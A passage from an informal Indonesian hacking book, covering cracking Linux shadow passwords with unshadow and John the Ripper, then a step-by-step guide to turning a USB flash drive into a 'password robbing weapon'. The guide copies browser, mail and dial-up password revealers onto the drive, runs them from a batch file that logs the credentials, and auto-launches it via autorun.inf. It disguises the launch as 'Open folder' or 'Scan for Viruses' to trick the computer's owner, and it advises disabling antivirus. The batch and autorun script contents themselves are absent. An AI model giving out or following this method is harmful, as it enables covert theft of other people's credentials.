kemudian kita pindah ke direktori john, karena kita akan bermain di direktori ini:

bt ~ # cd /pentest/password/john-1.7.2/run

kemudian kita unshadow file shadow tadi dan kita simpan di dump.txt:

bt run # unshadow /mnt/sda3/etc/passwd /mnt/sda3/etc/shadow > dump.txt

kemudian jalanin john buat ngecrack passwordnya:

bt run # john dump.txt

Sedikit teori, sambil menunggu si john menyelesaikan tugasnya (proses cracking bisa sangat lama lho..tergantung seberapa kuat password sang korban)

Page 46: buku kuroro yg belum juga selesai2

46

ehemm..

john the ripper merupakan tool geratis untuk password cracking. John mengombinasikan beberapa password cracker menjadi satu paket. John dapat mendeteksi tipe hash dan y. it combines a number of password crackers into one package, autodetects password hash type, and includes a customizeable cracker. it can run against various encrypted password formats including DES, MD4, MD5,KERBEROS AFS, and windows NT/200/XP/2003 LM HASH.

segitu aja ah teorinya and do not try to have me explain all of it!

Page 47: buku kuroro yg belum juga selesai2

47

Mencuri Password Menggunakan USB FlashDisk

Mungkin anda tidak menyangka bahwa media penyimpanan data yang sangat mobile seperti USB FlashDisk dapat menjadi sebuah media kejahatan yang sangat berbahaya. Saya serius ketika berkata berbahaya karena USB FlashDisk sebagai dapat digunakan sebagai senjata oleh para cracker untuk mencuri password anda tanpa anda ketahui dengan sarat sang cracker dapat menancapkan USB FlashDisk miliknya ke computer yang tersimpan password.

Dengan alasan tidak ingin repot, kebanyakan orang (termasuk saya) menggunakan password manager yang disediakan oleh banyak aplikasi, browser internet misalnya. Untuk penggunaan yang sering, memang fitur “remember me” atau “auto complete password” memang sangat memanjakan, tapi dibalik kemanjaan itu tersimpan potensi bahaya yang tidak akan menyenangkan bila anda yang jadi korban. Saya akan memperlihatkan kepada anda.

Pertama kita butuh software yang berfungsi untuk me-recover password. Saya tidak akan meminta anda untuk membuat sendiri password recoverer kok karena di dunia maya sudah ada banyak sekali yang mengembangkan aplikasi seperti itu dan GERATIS. Perlu diperhatikan bahwa menurut pengembang, beberapa antivirus akan memberikan false alarm untuk tools ini.

Page 48: buku kuroro yg belum juga selesai2

48

IE PassView (Internet Explorer Password View)

IE PassView merupakan password revealer untuk menampilkan password yang tersimpan di Internet Explorer. IE PassView dapat bekerja dengan baik pada semua versi Internet Explorer, dari IE 4.0 hingga IE 8.0. setelah anda menjalankan iepv.exe maka IE PassView akan manampilkan informasi alamat web, tipe Password (AutoComplete, Password-Protected Web Site, atau FTP), lokasi (Registry, Credentials File, Protected Storage), dan tentunya nama user dan passwordnya.

Wah! Ternyata di computer saya tidak ada password yang disimpan oleh Internet Explorer. Maaf karena saya tidak pernah menggunakan Internet Explorer di computer ini.

Page 49: buku kuroro yg belum juga selesai2

49

PasswordFox (Mozilla Firefox Password View)

PasswordFox ini memungkinkan anda membaca nama user dan password yang disimpan oleh Mozilla Firefox. Secara default PasswordFox akan menampilkan username dan password yang tersimpan di polder Profiles (C:\Documents and Settings\[user name]\Application Data\Mozilla\Firefox\Profiles\tabk8vv1.default), atau anda dapat mengubah direktori ini di menu File-Select Folder. Setelah anda menjalankan PasswordFox maka PasswordFox akan menampilkan informasi seperti : Record Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons filename.

Demi kepentingan saya, password dan username saya samarkan :P.

System Requirements: Windows 2000, Windows XP, Windows Server 2003, dan Windows Vista.

Page 50: buku kuroro yg belum juga selesai2

50

Mail PassView

Seperti namanya Mail PassView ini bermanfaat untuk menampilkan password dan informasi akun lain. email clients yang dapat ditampilkan oleh aplikasi berukuran mini ini diantaranya:

• Outlook Express

• Microsoft Outlook 2000 (akun POP3 dan SMTP)

• Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP dan SMTP)

• Windows Mail

• Windows Live Mail

• IncrediMail

• Eudora

• Netscape 6.x/7.x (bila password tidak dienkrip)

• Mozilla Thunderbird (bila password tidak dienkrip)

• Group Mail Free

• Yahoo! Mail (jika password disimpan di aplikasi Yahoo! Messenger)

• Hotmail/MSN mail (jika password disimpan di aplikasi MSN/Windows/Live Messenger)

• Gmail (jika password disimpan oleh Gmail Notifier, Google Desktop, atau Google Talk.

For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.

Page 51: buku kuroro yg belum juga selesai2

51

Page 52: buku kuroro yg belum juga selesai2

52

Dialupass

Description

When you use the "Dial-Up Networking" module for connecting to the internet or to other networks, the operating system give you the option to store the password and use it when it needed. Although the password is constantly stored in your computer, the operating system doesn't allow you to watch it. if you forget your password and you want to extract it from your computer, you can use the Dialupass utility for viewing the password. This utility enumerates all Dial-Up entries on your computer and reveals their logon details: User Name, Password and Domain.it works perfectly in the following operating systems: Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, and Windows XP. In Windows 2000 and Windows XP, the Dialupass utility can reveal the Dial-Up passwords only if you are logged on with administrator privileges.

System Requirements:

Semua versi Windows, dari Windows 98 hingga Windows Vista.

Kekurangan:

Pada Windows 2000/XP/2003: passwords dapat ditampilkan jika log in sebagai user setingkat administrator.

Pada Windows 95, nomer telepon tidak muncul.

Page 53: buku kuroro yg belum juga selesai2

53

Dengan menggunakan tools di atas dan sebuah USB FlashDisk anda dapat membuat sendiri sebuah rootkit untuk cracking. Keren kan??

Berikut ini adalah langkah-langkah untuk menjadikan USB FlashDisk anda sebagai senjata perampok password. Demi kelancaran anda perlu mematikan antivirus anda karena kemungkinan false alarm.

Kopi semua file executeable (iepv.exe, mailpv.exe, passwordfox.exe) ke USB FlashDisk anda. Kemudian buat batch file untuk menjalankan semua aplikasi pencuri password tersebut. Untuk itu buka notepad dan masukan key berikut:

Perintah (script) di atas akan menjalankan iepv.exe, mailpv.exe, passwordfox.exe dan mencatat semua password yang diperoleh ke file teks dengan nama yang anda tentukan, pada contoh “Mozilla Firefox_Password.txt”

Setelah anda mengetikkan script diatas, simpan notepad sebagai “launch.bat” tanpa tanda petik.

Untuk menjalankan launch.bat secara otomatis saat USB FlashDisk menancap kita membutuhkan file autorun.inf, untuk itu buka notepad dan buat autorun dengan mengetik script berikut:

Page 54: buku kuroro yg belum juga selesai2

54

Saya akan menjelaskan arti script di atas. Script tersebut memerintahkan sistem untuk menjalankan file launch.bat, dan sebagai cadangan dengan script shellexecute kita dapat menjalankan launch.bat dari pop-up menu autoplay. Dengan mengklik menu “Open folder to view files” sebenarnya kita telah menjalankan launch.bat, ini untuk menipu si pemilik computer, bila ia ada di sisi anda. Dan sebagai cadangan lagi (duh, saya paranoid sekali) script Shell berguna untuk menambah opsi baru pada menu bar file atau popup ketika anda melakukan klik kanan pada USB FlashDisk. Opsi tambahan itu adalah Explore, Open, Scan for Viruses..., ktiga opsi ini tidak lain dan tidak bukan akan menjalankan file launch.bat milik kita :P.

Jika anda berminat anda dapat mengubah file launch.bat menjadi file executeable (launch.exe) menggunakan BatToExeConverter

Page 55: buku kuroro yg belum juga selesai2

55

(http://f2ko.de)

Page 56: buku kuroro yg belum juga selesai2

56